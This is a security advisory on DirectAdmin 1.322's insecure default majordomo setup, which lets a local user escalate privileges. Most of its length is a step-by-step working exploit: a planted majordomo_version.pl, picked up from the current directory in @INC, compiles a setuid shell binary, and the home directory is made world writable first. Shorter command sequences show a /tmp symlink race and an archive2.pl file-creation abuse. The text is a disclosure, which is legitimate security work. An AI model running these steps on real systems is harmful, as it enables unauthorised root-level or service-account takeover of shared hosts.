DirectAdmin 1.322 - insecure majordomo setup allows for privilege escalation


Note: this issue was already covered in the majordomo documentation. The issue here is that DirectAdmin used an insecure, default setup of this 3rd party software.



DESCRIPTION


Due to an insecure default setup of the majordomo software, local users could escalate privileges to user:group majordomo:daemon.

UPDATE: 06/02/2010 - playing with this again for a few minutes reveals this was in fact trivially rootable through DirectAdmin, and in multiple ways.



IMPACT


Local users could escalate privileges to majordomo.daemon. This happens when running "/etc/virtual/majordomo/wrapper config-test" because the wrapper will look for a file called "majordomo_version.pl" from the paths inside @INC. Since the file is not found in any of the paths held in @INC, and since the very last path that is looked for in @INC is "." (the current directory), a local user can create a file called "majordomo_version.pl" inside the same directory that they run "/etc/virtual/majordomo/wrapper config-test", and the wrapper will attempt to execute that file. Since the wrapper runs as user:group majordomo:daemon, we must first give world writable permissions to our own home directory (or you can probably just use /tmp).


Here is example output of running the command mentioned above:

[user@host ~]$ /etc/virtual/majordomo/wrapper config-test
------------------------------------------------------------
---------------- Config-test for Majordomo ----------------
------------------------------------------------------------

[ ... ]

Good: 'require'd /etc/virtual/majordomo/majordomo.cf okay.
Good: found ctime.pl okay.
Can't locate majordomo_version.pl in @INC (@INC contains: [ ... ]
.) at /etc/virtual/majordomo/config-test line 129


Note the "." at the very end of the "@INC contains" section.

[user@host ~]$ cat > majordomo_version.pl << EOF
#!/usr/bin/perl

open my $shell_fh, '>', 'foo.c' or die $!;
print $shell_fh 'int main() { setreuid(102,102); setregid(2,2); system("/bin/bash"); }' . "\n";
close $shell_fh;

system("gcc foo.c -o foo");
system("chmod 6755 foo");
EOF
[user@host ~]$ chmod 755 ~/majordomo_version.pl
[user@host ~]$ chmod 777 ~
[user@host ~]$ /etc/virtual/majordomo/wrapper config-test
[user@host ~]$ ./foo
[majordmomo@host ~]$ id
uid=102(majordomo) gid=2(daemon) groups=503(user)


2 other issues were also reported, but won't be fully discussed here since the fix was simply a proper setup of the software. Examples can be found below.

[user@host ~]$ grep -n /tmp/log majordomo.pl
327:$log_file = "/tmp/log.$$";


[user@host ~]$ cd /tmp
[user@host /tmp]$ for x in `seq 1000 30000` ; do ln -s /etc/virtual/majordomo/foo log.$x ; done
[user@host /tmp]$ /etc/virtual/majordomo/wrapper digest
mj_digest: ABORT
[user@host /tmp]$ ls /etc/virtual/majordomo/foo
/etc/virtual/majordomo/foo



[user@host ~]$ chmod 777 ~
[user@host ~]$ /etc/virtual/majordomo/wrapper archive2.pl -f /home/user/test -a foo
[user@host ~]$ ls -l test
-rw-rw-r--  1 majordomo daemon    1 Sep  7 01:28 test